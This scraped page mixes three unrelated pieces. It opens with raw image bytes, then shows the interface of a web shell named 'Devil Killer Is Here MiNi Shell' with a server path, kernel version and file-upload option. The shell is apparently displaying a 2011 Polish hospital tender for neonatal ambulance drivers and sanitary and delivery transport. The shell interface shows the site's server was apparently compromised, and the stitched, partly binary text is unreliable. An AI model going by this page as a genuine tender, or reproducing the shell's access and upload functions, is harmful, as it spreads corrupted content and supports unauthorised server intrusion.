JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110314/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110314/82025-N-2011.html

<p class="kh_header"><b>Poznań: Usługa polegająca na: 
a)	zapewnieniu kierowców do obsługi karetek neonatologicznych i pracowników do pomocy przy transporcie inkubatora do  karetki  i z karetki
b)	zabezpieczeniu  transportu  sanitarnego  na  potrzeby  GPSK  UM  w  Poznaniu,
c)	zabezpieczeniu  transportu  dostawczego  na  potrzeby  GPSK  UM  w  Poznaniu</b><br>
<b>Numer ogłoszenia: 82025 - 2011; data zamieszczenia: 14.03.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ginekologiczno-Położniczy Szpital Kliniczny Uniwersytetu Medycznego im. Karola Marcinkowskiego w Poznaniu , ul. Polna 33, 60-535 Poznań, woj. wielkopolskie, tel. 061 8419294, faks 061 8419620.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa polegająca na: 
a)	zapewnieniu kierowców do obsługi karetek neonatologicznych i pracowników do pomocy przy transporcie inkubatora do  karetki  i z karetki
b)	zabezpieczeniu  transportu  sanitarnego  na  potrzeby  GPSK  UM  w  Poznaniu,
c)	zabezpieczeniu  transportu  dostawczego  na  potrzeby  GPSK  UM  w  Poznaniu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I.	Przedmiotem  zamówienia  jest   usługa polegająca na; 
1.	zapewnieniu kierowców do obsługi  karetek neonatologicznych i pracowników do pomocy przy transporcie inkubatora do  karetki  i z karetki
2.	zabezpieczeniu  transportu  sanitarnego  na  potrzeby  GPSK  UM  w  Poznaniu,
3.	zabezpieczeniu  transportu  dostawczego  na  potrzeby  GPSK  UM  w  Poznaniu

II.	Wymogi  Zamawiającego  odnoszące  się  do  przedmiotu  zamówienia:
Dotyczy  pkt.  I,  1.
1.	Zapewnienie  kierowców  do obsługi  karetek  VW  Transporter  2,5  TDI  o  numerze  rejestracyjnym PO888 CK i VW  CRAFTER  35 o numerze  rej. PO314 GJ, zarejestrowanych  w  dniu  07.12.2007 r.  i  13.12.2007 r.,  garażowanych na terenie Zamawiającego przy  ul.  Polnej  33,  przeznaczonych  do  przewozów neonatologicznych  na zlecenie wyznaczonego  lekarza  Kliniki  Neonatologii  GPSK UM  oraz zapewnienie  pracowników do pomocy przy transporcie inkubatora do  karetki  i  z  karetki.
a)	pojazdy  objęte  są  ubezpieczeniem  OC,   NW,  AC  ( w  pełnym  zakresie ),
b)	w  odniesieniu  do  w/w  pojazdów  Zamawiający  posiada  zezwolenia  MSWiA  na  ich  uprzywilejowanie  w  ruchu  drogowym,
c)	karetki  neonatologiczne  odpowiadają  warunkom  technicznym  określonym w  Rozporządzeniu  Ministra  Infrastruktury  z  dnia  31.12.2002 r.  (  Dz. U.  z  2003 r.  Nr 32  poz. 262  z  późn.  zm. )  w  sprawie  warunków  technicznych  pojazdów  oraz  zakresu  ich  niezbędnego  wyposażenia. 
d)	wyjazdy  odbywać  się  będą  głównie  na terenie  województwa  wielkopolskiego,  sporadyczne  wyjazdy  na  teren  kraju,  szacowana  ilość  kilometrów  to  5 300  w  skali  miesiąca.
2.	Zadania  Wykonawcy;
a)	użytkowanie  pojazdów  przemiennie,
b)	zapewnienie  kierowców  do  obsługi  jednej  z  eksploatowanych  zamiennie  karetek  wymienionych  w  
pkt. 1,  każdego  dnia  w  okresie  obowiązywania umowy  przez  24 godziny  i  pracowników do pomocy przy transporcie inkubatora  do karetki  i z karetki
c)	codzienne  rozliczanie  wyjazdów  na  podstawie  kart  drogowych  potwierdzonych  przez  lekarza  neonatologa  zlecającego  wyjazd;  karty  drogowe  wydaje  Dział  Administracyjno - Gospodarczy  GPSK,
d)	codzienna  obsługa  techniczna  pojazdu  mająca  na  celu  zapewnienie  sprawności  pojazdu,
e)	bieżące  zgłaszanie  usterek  pojazdu  na  piśmie,
f)	każdorazowo  tankowanie  pojazdu  do  pełnego  zbiornika  na  koszt  Zamawiającego;  zwrot  Wykonawcy  kosztów  paliwa  na  podstawie  przedstawionych  rachunków / faktur   następnego  dnia  roboczego  po  jego  zakupie,  ilość  litrów  paliwa ,  nr  rachunku / faktury  należy  wpisać  do  karty  drogowej,
g)	utrzymanie  pojazdu  w  należytej  czystości;  zewnętrzne  mycie  pojazdu,  mycie  i  sprzątanie  kabiny  kierowcy  z  wyłączeniem  przedziału  medycznego, własnymi środkami myjącymi oraz uzupełnianie płynu do spryskiwaczy,
h)	nadzór  nad  terminami;  przeglądów  serwisowych,  wymiany  oleju  silnikowego,  wymiany  płynu  hamulcowego,  zmiany  opon,  itp.
i)	nadzór  nad  terminami  przeglądów  technicznych;  przedłużanie  dowodu  rejestracyjnego pojazdu,
j)	przedkładanie  Zamawiającemu  miesięcznego  harmonogramu  pracy  kierowców  i pracownika- zgodnie  z  kodeksem  pracy - na  3  dni  przed  rozpoczęciem  każdego  miesiąca,
k)	posiadanie  telefonów  sieci  komórkowej  w  celu  utrzymania  stałej  łączności  ze  szpitalem,  numer  telefonu  Wykonawca  przedstawia  w  wykazie  osób  przewidzianych  do  realizacji  usługi,  z  przypisaniem  aparatu  do  poszczególnego  kierowcy,
l)	wyposażenie  pracowników  w  jednolitą  odzież  ochronną  celem  identyfikacji  jako  pracowników  transportu  sanitarnego,
m)	odpowiedzialność  za  powierzone  mienie,
n)	użytkowanie  pojazdów  zgodnie  z  ich  przeznaczeniem  i  na  użytek  Zamawiającego,  bez  możliwości  wykonywania  zleceń  na  wezwanie  innych  podmiotów,
o)	obsługa  karetek  przez  kierowców  spełniających  wymagania  określone  w  art. 95 a ust. 1,  art. 122  i  art. 124  Prawa  o  ruchu  drogowym  (  Dz. U.   z  2005 r.  Nr 108  poz. 908  z  późn.  zm. ),
p)	rozpoczęcie  świadczenia  usługi  w  ciągu  30  minut  od  zgłoszenia,
q)	przestrzeganie  przepisów  bezpieczeństwa  uwzględniających specyfikę  wykonywanej  usługi.


      Dotyczy  pkt.  I,  2.
1.	Usługa  polegająca  na  zabezpieczeniu  transportu  sanitarnego  od  poniedziałku  do  piątku  w  godzinach  
od  8:00  do  15:00  w  obrębie  miasta  Poznania, sporadyczne  wyjazdy  na  teren  województwa  wielkopolskiego, szacowana  ilość  kilometrów; 1 000  miesięcznie.  W  uzasadnionych  przypadkach,  na  podstawie  zlecenia  akceptowanego  przez  Dyrektora  Szpitala  możliwość  wydłużenia  godzin  świadczenia  usługi.
a)	realizacja  usługi  pojazdem  przystosowanym  jako  pojazd  uprzywilejowany,  posiadającym  ważne  pozwolenie  na  używanie  sygnałów   świetlnych  i  dźwiękowych  wydane  przez  MSWiA,


b)	realizacja  usługi  pojazdem  odpowiadającym  warunkom  technicznym  określonym w  Rozporządzeniu  Ministra  Infrastruktury  z  dnia  31.12.2002 r.  ( Dz. U.  z  2003 r.  Nr 32  poz. 262  z  późn. zm.) w sprawie  warunków  technicznych  pojazdów  oraz  zakresu  ich  niezbędnego  wyposażenia,
c)	obsługa  pojazdu  przez  kierowców,  którzy  spełniają  wymagania  określone  w  art. 95 a  ust. 1,  art. 122  
i  art. 124  Prawa  o  ruchu  drogowym  (  Dz. U.   z  2005 r.  Nr 108  poz. 908  z  późn.  zm. ),
d)	pojazd  przystosowany  do  przewozu  2-3  osób  chodzących,
2.	Zadania  Wykonawcy;
a)	podstawienie  samochodu  wraz  z  kierowcą,
b)	realizacja  zleceń  wydawanych  przez  Izbę  Przyjęć  i  Centralne  Laboratorium  GPSK,
c)	przewożenie  pod  wskazany  adres  pod  nadzorem  pielęgniarki  Szpitala  pacjentów  chodzących  na  zlecone  przez  lekarza  konsultacje,
d)	przewożenie  preparatów  medycznych,  krwi,  wyników  badań,
e)	wykonywanie  usługi  zgodnie  ze  zleceniem  wyjazdu,
f)	posiadanie  telefonów  sieci  komórkowej  w  celu  utrzymania  stałej  łączności  ze  szpitalem,  numer  telefonu  Wykonawca  przedstawia  w  wykazie  osób  przewidzianych  do  realizacji  usługi,  z  przypisaniem  aparatu  do  poszczególnego  kierowcy,
g)	przestrzeganie  przepisów  bezpieczeństwa  uwzględniających  specyfikę  wykonywanej  usługi,
h)	w  przypadku  awarii  pojazdu  podstawienie  pojazdu  zastępczego  w  ciągu  1  godziny  spełniającego  wymogi  określone  w  specyfikacji,
i)	rozliczenie  z  Zamawiającym  w  okresach  miesięcznych  na  podstawie  kart  drogowych,  wystawionych  przez  Wykonawcę,  zawierających  między  innymi  godzinę  rozpoczęcia  i  zakończenia  usługi, liczbę przejechanych kilometrów oraz  potwierdzenie  wykonania  usługi  przez  upoważnionego  pracownika  Izby  Przyjęć  lub  Centralnego  Laboratorium. 
j)	cena  za  świadczoną  usługę  obliczona  będzie  jako  iloczyn  przejechanych  kilometrów  i  stawki  za  1 km 

Dotyczy  pkt.  I,  3.
1.	Usługa  polegająca  na  zabezpieczeniu  transportu  dostawczego  od  poniedziałku  do  piątku  
w  godzinach  od  8:00  do  15:00  w  obrębie  miasta  Poznania,  sporadyczne  wyjazdy  poza  miasto,   przy  średnim  przebiegu  miesięcznym  kilometrów  1300.
2.	Zadania  Wykonawcy;
a)	podstawienie  samochodu  wraz  z  kierowcą,  do  przewozu  towarów  i  osób,
b)	przewidywane  towary  do  przewozu;  urządzenia  i  sprzęt  medyczny,  sprzęt  komputerowy,  meble,  drobny  sprzęt  RTV  i  AGD,  artykuły  malarskie  i  techniczno - instalacyjne,  płyty  i  deski  o  różnych  gabarytach,  spirytus    w  ilości  do  333  litrów.
c)	przewidywane  ilości  km w miesiącu do  przewozu : osób i drobnego sprzętu  około   800 km,  towarów około  500 km
d)	realizacja  zleceń  na  potrzeby  Działu  Zaopatrzenia,  Działu  Żywienia,  Apteki,  Działu  Kadr  i  Płac,  Dyrekcji,  Naczelnej  Pielęgniarki  itp.,
e)	posiadanie  telefonów  sieci  komórkowej  w  celu  utrzymania  stałej  łączności  ze  szpitalem, 
f)	zapewnienie  bezpieczeństwa  przewożonych  osób  i  mienia,
g)	rozliczenie  z  Zamawiającym  w  okresach  miesięcznych,  na  podstawie  kart  drogowych,  wystawionych  przez  Wykonawcę  zawierających   między  innymi  godziny  rozpoczęcia  i  zakończenia  pracy,  trasę  przejazdu , liczbę  przejechanych  kilometrów  oraz  potwierdzenie  wykonania  usługi    upoważnionego  pracownika  Działu,  na  potrzeby  którego  realizowana  była  usługa.
h)	cena  za  świadczoną  usługę  obliczana  będzie  jako  iloczyn  przejechanych  kilometrów  i  stawki  za  1 km..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8, 60.00.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 18.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie  wyznacza  szczegółowego  warunku  w  tym  zakresie, tym samym  nie  dokonuje  jego  opisu,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, gdy Wykonawca  wykaże,  że  wykonał  lub  wykonuje  w  okresie  ostatnich  trzech  lat  przed  upływem  terminu  składania  ofert,  a  jeżeli  okres  prowadzenia  działalności  jest  krótszy - w  tym  okresie,  jedną usługę  odpowiadającą przedmiotowi zamówienia  tj. usługę transportu sanitarnego R lub N  o wartości 200 000 zł brutto</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, gdy  Wykonawca:
- zapewni realizację  usługi polegającej na zabezpieczeniu transportu sanitarnego środkiem transportu  przystosowanym  jako  pojazd  uprzywilejowany,  posiadającym  ważne  pozwolenie  na  używanie  sygnałów świetlnych  i  dźwiękowych  wydane  przez  MSWiA,
-	zapewni realizację  usługi  polegającej na zabezpieczeniu transportu sanitarnego środkiem  transportu  odpowiadającym  warunkom  technicznym  określonym  w  Rozporządzeniu  Ministra  Infrastruktury  z  dnia  21.12.2002 r.  ( Dz. U.  z  2003 r.  Nr  32,  poz. 262  z  późn.  zm. )  w  sprawie  warunków  technicznych  pojazdów  oraz  zakresu  ich  niezbędnego  wyposażenia,
-	dysponować  będzie  jednym  samochodem  na  zabezpieczenie transportu sanitarnego i jednym  samochodem  na  zabezpieczenie  transportu  dostawczego.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, gdy  Wykonawca:
-	zapewnieni obsługę pojazdów przez kierowców  spełniających  wymagania  określone  w   art.  95 a  ust. 1,  art.  122  i  art.  124  ustawy  -  Prawo  o  ruchu  drogowym  ( Dz. U.  z  2005 r.  Nr 108,  poz. 908  z  późn. zm.)  tj. posiadających  aktualne  zaświadczenia  lekarza  medycyny  pracy  o  zdolności  do  wykonywania  pracy  na  stanowisku  kierowcy  karetki  neonatologicznej,  kierowcy  transportu  sanitarnego  oraz  kierowcy  transportu  dostawczego,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku Zamawiający uzna  ubezpieczenie  od  odpowiedzialności  cywilnej  w  zakresie  prowadzonej  działalności  na  kwotę  minimum  100 000.00  zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oferta  - wypełniony formularz oferty, załącznik  nr  3  do  specyfikacji.
Załączniki  do oferty;
formularz  specyfikacji   cenowej;  załącznik  nr  2  do  specyfikacji,
parafowany  przez  Wykonawcę  wzór  umowy;  załącznik  nr  9, nr 10 i nr 11 do  specyfikacji,

Oferta  wraz  z  załącznikami  musi  być  podpisana  przez  osobę  upoważnioną  do  reprezentowania  Wykonawcy,  w  przypadku  przedsiębiorcy  zgodnie  z  zasadami  reprezentacji  wskazanymi  we  właściwym  rejestrze  lub  np.  ewidencji  działalności  gospodarczej.  Do  oferty  należy  dołączyć  dokument  lub  pełnomocnictwo,  z  którego  wynika  uprawnienie  osoby  (osób)  do  składania  oświadczeń  woli  i  reprezentowania  Wykonawcy,  jeżeli  prawo  to  nie  wynika  z  rejestru.  W  takiej  sytuacji  dokument  lub  pełnomocnictwo  muszą  być  integralną  częścią  oferty.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Z uwzględnieniem zapisu art. 144 ust. 1 ustawy Zamawiający przewiduje możliwość dokonania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy oraz  określa warunki tych zmian poprzez wprowadzenie do zawartej umowy następujących aneksów;
a)	aneks cenowy dopuszczający zmianę ceny w przypadku zmiany stawki podatku VAT zgodnie z obowiązującymi przepisami,
b)	aneks  cenowy  dopuszczający  jedną  zmianę  ceny  po  upływie  dwunastu  miesięcy  obowiązywania  umowy  w  oparciu  o  wysokość  wskaźnika  wzrostu  cen  towarów  dla  poszczególnych  grup  produktów  opublikowanego  w  Biuletynie  Statystycznym  GUS - Wskaźnik Cen Towarów i Usług Konsumpcyjnych, Tabl.41,
c)	aneks dopuszczający zmianę umówionego terminu wykonania zamówienia z powodu okoliczności siły wyższej, 
np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć 
z pewnością, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach,
d)	aneks dopuszczający zmianę umówionego terminu wykonania zamówienia z powodu działań osób trzecich uniemożliwiających wykonanie  usług, a które to działania nie są konsekwencją winy którejkolwiek ze stron.
W  celu  dokonania  zmian  zapisów  umowy  wnioskowanych  przez  Stronę,  zobowiązana  jest  ona  pisemnie  wystąpić  z  propozycją  zmiany  warunków  umowy  wraz z  ich  uzasadnieniem,  z  co najmniej dwutygodniowym wyprzedzeniem.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.gpsk.am.poznan.pl/dzp<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację  można  odebrać  osobiście  w  siedzibie  Zamawiającego  przy  ul.  Polnej  33  w  Poznaniu, budynek E1, pokój nr 104.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.03.2011 godzina 09:00, miejsce: Siedziba Zamawiającego przy  ul. Polnej  33 , w pokoju  nr  317 - Kancelaria  Ogólna  mieszcząca  się  w  Budynku  Wielofunkcyjnym  Szpitala, wejście  D1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





